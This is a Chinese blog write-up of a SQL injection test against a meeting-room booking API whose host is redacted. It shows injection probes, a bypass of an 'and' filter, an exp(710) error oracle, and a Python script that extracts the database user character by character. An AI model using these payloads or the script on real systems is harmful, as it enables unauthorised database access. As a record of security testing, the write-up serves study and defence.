0x01判断注入

正常请求
20590-asb8wd9jr5k.png

为参数office添加单引号,页面提示未知级应用错

50371-dmf2z504yyn.png

猜测语句大概如下

select xxx from xxx where office='wankezhongxin''

两个单引号正常
65151-vz0u7m0isr9.png

大概语句如下

select xxx from xxx where office='wankezhongxin'''

0x02 注入方式

因为有回显一开始打算走联合所以这里先想尝试一下先注释

wankezhongxin'#

57285-vf9a4jfv0a.png

但是测试了许多种姿势去注释都没成功

wankezhongxin'#
wankezhongxin'--+
wankezhongxin')#
wankezhongxin')--+
.....

然后这里我就打算尝试能不能闭合了,还是提示错误

wankezhongxin'and'1'='1

此时猜测可能代码层拦截或者过滤了什么

65535-qo11t26e2an.png

将and替换为& 或-+ * / ^ | 都可以

29637-i8f84seti0i.png

然后就是构造出true跟false两种状态,这里使用exp(1) 跟exp(710) 配合if ,注: exp(710) 在mysql会错误,这里1=1返回成功

'& if(1=1,exp(1),exp(710)) &'

27139-327rn9hkkbd.png

1=2错误

26152-3ma3x5mvoam.png

0x03 获取用户名

这里测试的时候 user() database() 等全部错误,这里通过CURRENT_USER查询用户名跟user()同理

01820-yk1jp050ttg.png

手动测试出长度为21

'& if(length(CURRENT_USER)=21,exp(1),exp(710)) &'1

81500-ptxxvo3y34b.png

写二分脚本出具体数据

import requests
import time 
name='' 
no=r'101' 
for j in range(1,22): 
    l = 32 
    h = 127 
    while abs(l-h)>1: 
        i=int((l+h)/2) 
        url = "https://xxxxxx.com"
        headers = {"Connection": "close", "sec-ch-ua": "\"Google Chrome\";v=\"89\", \"Chromium\";v=\"89\", \";Not A Brand\";v=\"99\"", "Accept": "application/json, text/plain, */*", "empId": "20228530", "sec-ch-ua-mobile": "?0", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "Origin": "https://XXXXX", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Dest": "empty", "Referer": "XXXXXXXX", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Content-Type": "application/json;charset=UTF-8"}
        burp0_json={"city": "shanghai", "endTime": "24:00", "meetingDay": "2022-05-09", "office": "'& if(ascii(substr(CURRENT_USER,"+str(j)+","+str(i)+"))>"+str(i)+",exp(1),exp(710)) &'1", "startTime": "9:00"}
        r=requests.post(url, headers=headers, json=burp0_json)
        time.sleep(0.2) 
        if not no in r.text: 
            l = i 
        else:
            h = i 
    name += chr(h) 
    print(chr(h)) 
print(name)

运行结果
34092-zby3sbeefzq.png

最后修改:2022 年 08 月 09 日
如果觉得我的文章对你有用,请随意赞赏